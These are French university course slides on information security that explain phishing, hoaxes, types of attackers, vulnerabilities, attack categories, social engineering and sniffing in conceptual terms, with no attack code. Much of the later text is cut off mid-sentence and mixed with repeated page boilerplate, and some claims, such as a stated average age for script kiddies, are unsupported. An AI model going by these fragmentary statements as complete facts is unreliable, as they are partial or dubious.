 Le phishing (traduit parfois en « hameçonnage ») est une technique frauduleuse
utilisée par les pirates informatiques pour récupérer des informations (généralement
bancaires) auprès d'internautes.
 Le phishing est une technique d'ingénierie sociale consistant à exploiter non pas une
faille informatique mais la « faille humaine » en dupant les internautes par le biais d'un
courrier électronique semblant provenir d'une entreprise de confiance (banque, site
de commerce électronique, etc.).
 Le mail envoyé par ces pirates usurpe l'identité d'une entreprise et les invite à se
connecter en ligne par le biais d'un lien hypertexte et de mettre à jour des
informations les concernant dans un formulaire d'une page web factice, copie
conforme du site original, en prétextant par exemple une mise à jour du service, une
intervention du support technique, etc.
 Ainsi, par le biais du formulaire, les pirates réussissent à obtenir les identifiants et mots
de passe des internautes ou bien des données personnelles ou bancaires (numéro de
client, numéro de compte en banque, etc.).

Canulars (Hoax)
 On entend par canular (hoax) un courrier électronique propageant une fausse information
et poussant le destinataire à diffuser la fausse nouvelle à tous ses proches ou collègues.
 Le but des hoax consiste à provoquer la satisfaction de son concepteur d'avoir berné un
grand nombre de personnes.
 Les conséquences de ces canulars sont multiples :
 L'engorgement des réseaux en provoquant une masse de données superflues
circulant dans les infrastructures réseaux ;
 Une désinformation : faire admettre à de nombreuses personnes de faux concepts ou
véhiculer de fausses rumeurs ;
 L'encombrement des boîtes aux lettres électroniques déjà chargées ;
 La perte de temps, tant pour ceux qui lisent l'information, que pour ceux qui la
relayent ;
 La dégradation de l'image d'une personne ou bien d'une entreprise ;
 L'incrédulité : à force de recevoir de fausses alertes les usagers du réseau risquent de
ne plus croire aux vraies.

PLAN DU CHAPITRE 2
1 Vulnérabilités
Ingénierie sociale

Vulnérabilités
Attaques de sécurité
Typologie des attaquants
 On distingue principalement trois types de pirates informatiques :
Hackers
Les hackers sont des professionnels de la sécurité informatique qui recherchent et repèrent
les failles des systèmes et réseaux au profit d’une entreprise dans le but de les corriger. C’est
les gentils ”chapeaux blancs” (White hat hacker) : consultants, administrateurs.
Crackers
Les crackers sont des professionnels qui recherchent, repèrent et exploitent les failles des
systèmes et réseaux sans autorisations et pour des buts illégaux. C’est les méchants
”chapeaux noirs” (Black hat hacker) : créateurs de virus, cyber-espions, cyber-terroristes…
Script Kiddies
Des amateurs (des pirates néophytes) qui piratent en exploitant des programmes écrits par
d’autres. Ils ne disposent que de peu de connaissances sur leur mode de fonctionnement et
cherchent souvent à impressionner par leurs toutes nouvelles connaissances en
informatique. Les script Kiddies ont en moyenne 12-15 ans.

Chapitre 2

Transféré par

Droits d'auteur :

Formats disponibles

Chapitre 2

Transféré par

Informations du document

Titre original

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

Chapitre 2

Transféré par

Droits d'auteur :

Formats disponibles

UNIVERSITÉ DE LA MANOUBA

ÉCOLE NATIONALE DES SCIENCES DE L’INFORMATIQUE

3 Typologie des attaquants

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 21

3 Typologie des attaquants

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 31

3 Typologie des attaquants

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 41

 On entend par vulnérabilités toutes les faiblesses des ressources d’un

 On distingue trois grandes familles de vulnérabilités :

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 51

3 Typologie des attaquants

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 61

 Manque de maîtrise de la sécurité des systèmes d’information et de

Des ressources humaines spécifiques doivent être affectées à la

 Mauvaise utilisation des moyens en place et absence de contrôles effectifs

 Absence de procédures relatives à la sécurité des systèmes d’information :

 Manque d’information des utilisateurs : même si des procédures de sécurité

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 71

 Inadéquation entre la politique de sécurité et les risques : l’évaluation réelle

 Organisation interne : la multiplication des pôles informatiques avec leurs

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 81

3 Typologie des attaquants

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 91

 Non-redondance : l’indisponibilité d’un serveur ou d’une base de données,

 Manque de contrôle d’accès aux éléments physiques : l’accès aux salles

 Mauvaise conservation de supports de sauvegarde.

 Mauvaise gestion des ressources : les ressources doivent être

 Absence de gestion du câblage, ce qui peut entraîner des déconnexions

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 101

3 Typologie des attaquants

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 111

 Interopérabilité des systèmes d’information et de communication : dans le

 Fiabilité des mises à niveau et correctifs (patchs) : souvent la mise en place

 Complexité des règles sur les pare-feux et routeurs d’accès : la mise en

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 121

3 Typologie des attaquants

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 131

3 Typologie des attaquants

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 141

Attaque d’interception Attaque d’interruption/saturation

Atteinte à la confidentialité Atteinte à la disponibilité

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 151

Attaque de modification Attaque d’usurpation d’identité/Fabrication

Atteinte à l’intégrité Atteinte à l’authenticité

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 171

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 181

3 Typologie des attaquants

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 191

 L’ingénierie sociale (social engineering) est une attaque qui cherche à

 Contrairement aux autres attaques, elle ne nécessite pas de logiciel.

 Il existe 4 grandes méthodes de social engineering, à savoir :

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 201

3 Typologie des attaquants

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 211

 Le sniffer peut être un équipement matériel ou un logiciel. Généralement, le

 On distingue deux types de sniffing :

SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 231

 Active sniffing : à travers un switch